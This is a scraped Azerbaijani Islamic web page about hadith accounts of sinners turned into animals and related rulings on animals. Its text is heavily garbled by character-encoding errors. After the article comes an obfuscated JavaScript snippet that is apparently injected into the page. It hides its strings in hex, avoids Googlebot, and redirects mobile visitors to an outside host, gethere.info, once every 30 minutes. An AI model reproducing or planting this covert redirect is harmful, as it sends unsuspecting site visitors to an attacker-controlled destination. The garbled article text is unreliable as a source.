INILIFE.RU
Son xəbərlər
Əsas səhifə / İslam / Şəriət hökmləri / Heyvana A�evrilmiAY insanlar

Heyvana A�evrilmiAY insanlar

HE�zrE�t ??li (E�) buyurur ki, bir gA?nx54c6aed8d555a.jpg.pagespeed.ic.xgj3vw74ql_3146_large PeyAYE�mbE�rdE�n (s) mE�sx olmuAY heyvanlar haqqA�nda soruAYdum. HE�zrE�t buyurdu: a�?Fil, ayA�, donuz, meymun, ilanbalA�AYA�, kE�rtE�nkE�lE�, dovAYan, yarasa, E�qrE�b, hA�rA?mA�E�k, aAY-qara soxulcan, dE�niz canlA�larA�ndan suhE�yl vE� zA�hrE�.a�? HE�zrE�t ??li (E�) hE�zrE�t PeyAYE�mbE�rdE�n (s) bu heyvanlarA�n mE�sx olma sE�bE�bi barE�dE� soruAYur. HE�zrE�t buyurur: a�???qrE�b E�vvE�lcE� acA� dilli bir kiAYi idi, kimsE� onun dilindE�n amanda qala bilmE�zdi. HamA�nA� zE�hE�rlE�yE�rdi. Donuz E�vvE�llE�r nE�srani bir AYE�xs idi. Allahdan sE�ma qidasA� istE�di. Allah ona bu qidanA� gA�ndE�rE�ndE� kA?fr etdi. Fil livatla mE�AYAYul olan bir kiAYi idi. AyA� baAYqa kiAYilE�ri A�z oyunu ilE� A�zA?nE� cE�zb edE�n bir kiAYi idi. HA�rA?mA�E�k E�vvE�llE�r E�rinE� xE�yanE�t etmiAY bir qadA�n idi. DovAYan E�vvE�llE�r heyz vE� digE�r qA?sllE�ri yerinE� yetirmE�yE�n qadA�n idi. A�lanbalA�AYA� A�z zA�vcE�sini baAYqalarA�nA�n ixtiyarA�na verE�n bir kiAYi idi. KE�rtE�nkE�lE� bir bE�dE�vi idi, HE�ccE� gedE�nlE�ri qarE�t edE�rdi. Meymun E�vvE�llE�r AYE�nbE� gA?nA? AllahA�n qadaAYasA�nA� pozub balA�q ovuna gedE�rdi. Bir zaman bu qadaAYa vardA�. Yarasa xalqA�n xA�rmanlarA�nA� A�alA�b-A�apan oAYru idi. Qara soxulcan insanlar arasA�nda sA�z gE�zdirib, ara vuran bir AYE�xs idi. DE�niz canlA�larA�ndan olan sA?hE�yl gA?nah iAYlE� mE�AYAYul olan bir AYE�xs idi. BaAYqa bir dE�niz canlA�sA� olan zA�hrE� Harut vE� Marutu aldatmA�AY nE�srani qadA�n idi.a�?
BelE� bir sual verilir ki, bir zaman mE�sx olmuAY insanlarA�n bugA?nki nE�sillE�rinE� mA?nasibE�t necE�dir?
Bu genetikaya aid bir mA�vzu deyil. A?mumiyyE�tlE� tE�crA?bi elmlE�r belE� mE�sE�lE�lE�ri araAYdA�rmaq gA?cA?ndE� deyil. ??gE�r bu gA?n hE�min mE�sx olmuAY insanlardan qalA�rsa da, bunu sA?buta yetirmE�k A�E�tindir. Amma rE�vayE�tlE�rdE� bu mE�sE�lE�yE� toxunulur. A�mam SE�ccad (E�) buyurur: “ME�sx olanlar cE�mi 3 gA?n diri qaldA�lar. Sonra Allah yaAYA�AY vE� kA?lE�k gA�ndE�rib, onlarA� dE�nizdE� batA�rdA�. ME�sx olmuAYlar arasA�nda 3 gA?ndE�n artA�q qalan olmayA�b. Bu gA?n gA�rdA?yA?mA?z heyvanlar yalnA�z onlarA�n oxAYarlarA�dA�r.” BE�zE�n it, donuz, meymun E�tinin haram olmasA� barE�dE� soruAYulur. Bunu bir nA�v onlarA�n mE�sx olmuAY heyvanlar olmasA� ilE� E�laqE�lE�ndirmE�k istE�yirlE�r. ??slindE� bu onlarA�n E�tindE�ki zE�rE�rlE� baAYlA�dA�r. HE�r halda bunu onlarA�n mE�sx olmasA� ilE� E�laqE�lE�ndirmE�k olmaz.”
ME�mun A�mam Rizadan (E�) soruAYur ki, mE�sx olmuAY insanlarA�n aqibE�ti necE� oldu? A�mam buyurur: “Bu insanlar AllahA�n qE�zE�binE� gE�lib mE�sx edilmiAY, heyvana A�evrilmiAY insanlardA�r. Onlar gA?ndE�n sonra A�ldA?lE�r. OnlarA�n nE�sli qalmayA�b. Bu gA?n dA?nyada gA�rdA?yA?mA?z meymun, donuz vE� baAYqa heyvanlar hE�min nE�sildE�n deyil. OnlarA�n da baAYqa heyvanlar kimi E�ti haramdA�r.”
Daha A�ox dovAYanA�n mE�sx olmasA� barE�dE� soruAYulur. AllahA�n bA?tA?n yaratdA�qlarA� gA�zE�ldir. CanlA� orqanizmindE�n A�A�xan sidik vE� nE�cis tE�biidir. OnlarA�n hE�r birinE� mA?nasibE�tdE� AYE�ri hA�kmlE�r var. Ruhu olan bA?tA?n varlA�qlarda qan var. Qan hE�yat yaradA�r. Amma onu iA�mE�k haramdA�r. DovAYan vE� digE�r canlA�lar AllahA�n yaratdA�AYA� canlA�lar olaraq gA�zE�ldirlE�r. Amma insanA�n bu heyvanlara mA?nasibE�tdE� AYE�ri hA�kmlE�rE� E�mE�l etmE�si lazA�mdA�r. ??gE�r heyvanA�n E�ti haramsa insan onun E�tindE�n istifadE� edE� bilmE�z. Heyvanlar arasA�nda yalnA�z it vE� quru donuzu tam nE�cisdir. BaAYqa heyvanlar pakdA�rlar. Amma murdar olmayan heyvanlarA�n da arasA�nda E�ti haram olanlar var. Bu heyvanlarA�n dE�risi, tA?kA?nA?n insanA�n namazA�na tE�siri var. ??gE�r E�ti haram olan heyvanA�n bir tA?kA? insanA�n A?stA?ndE� olarsa bu vE�ziyyE�tdE� qA�ldA�AYA� namaz batildir. HeyvanlarA�n yaxAYA�-pisliyini, onlara mA?nasibE�ti onlarA�n E�tinin haram olmasA�, murdar-tE�mizliyi ilE� E�laqE�lE�ndirmE�k dA?zgA?n deyil. A�slam dinindE� heyvanlarA�n qorunmasA�, hifz olunmasA� tapAYA�rA�lA�r. Heyvana rE�hm etmE�yE�n insana Allah dA?nya vE� axirE�tdE� rE�hm etmE�z. A�nsan yaranmA�AYlarA�n E�n AYE�rE�flisidir. BA?tA?n varlA�q alE�mi insana xatir yaradA�lmA�AYdA�r. Amma hE�min bu insan A�lE�ndE� murdar olur. ??gE�r yaAY E�llE� ona toxunsan, E�lini suya A�E�kmE�lisE�n. Amma A�lA?nA?n A�zA?nE� dE� mA?nasibE�tdE� A�slamA�n hA�kmlE�ri var. A�slamA�n insan haqlarA�na diqqE�tindE�n danA�AYarkE�n onun tE�k A�lA?lE�rE� verdiyi hA?ququ qeyd etmE�k kifayE�t edE�r. A�lA?nA? yandA�rmaq olmaz, A�lA?nA? tE�hqir etmE�k olmaz. A�lA? dE�fn edilmE�lidir. BA?tA?n bunlar A�lA? A?A�A?n nE�zE�rdE� tutulmuAY hA?quqlardA�r. DeyilE�nlE�rdE�n belE� qE�naE�tE� gE�lirik ki, AYE�riE�t hA�kmlE�ri tE�biE�t qanunlarA�ndan fE�rqlE�nir. TE�biE�t qanunlarA� sA�rf fiziki varlA�qla baAYlA�dA�r. AzE�riE�t qanunlarA� isE� AllahA�n insanA�n tE�kamA?lA? A?A�A?n tE�yin etdiyi qanunlardA�r. AzE�ri hA�kmlE�r yalnA�z insan vE� cinlE�rE� aiddir. YE�ni bu hA�kmlE�rin icrasA�na yalnA�z cinlE�r vE� insanlar mE�suliyyE�t daAYA�yA�r. A�t AYE�ri baxA�mdan murdar sayA�lA�r. Amma dinimiz bu heyvanA�n vE�fadarlA�AYA�nA�, faydalarA�nA� inkar etmir. DovAYan yaranA�AYA�n E�vvE�lindE� insan olub. AllahA�n qE�zE�binE� gE�lE�rE�k bu insan mE�sx edilE�rE�k dovAYana A�evrilib. ??gE�r dovAYan bir zaman mE�sx olunmuAYsa, biz bu gA?n dovAYana qarAYA� amansA�z ola bilmE�rik. ME�sx hadisE�sinin sE�bE�blE�rindE�n biri gA?nahkar insanA�n cE�zalandA�rA�lmasA�dA�r. Bu baAYqalarA� A?A�A?n ibrE�t olmalA�dA�r. ??gE�r ilk insan torpaqdan yardA�lA�bsa, bu bA?tA?n insanlara aid edilE� bilmE�z. ME�sx olmuAY heyvanlar da belE�dir. DovAYan bir zaman mE�sx olmuAY pis insandA�r deyib, bu gA?n dovAYana nifrE�tlE� baxmaq dA?zgA?n deyil. DovAYan insana E�ziyyE�t vermE�yE�n, yA�rtA�cA� olmayan bir heyvandA�r. A�slam belE� bir heyvanlarA� qorumaAYA�, onlarA�n hA?quqlarA�na riayE�t etmE�yi tapAYA�rA�r. Amma dovAYanA�n E�ti haramdA�rsa bu onun bir zaman mE�sx olmasA� ilE� baAYlA� deyil. A�nsan yaranmA�AYlarA�n AYE�rE�flisi olduAYu halda onun da E�ti haramdA�r.(Ahliman.info)

 

xacmazmescidi.com

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Scroll To Top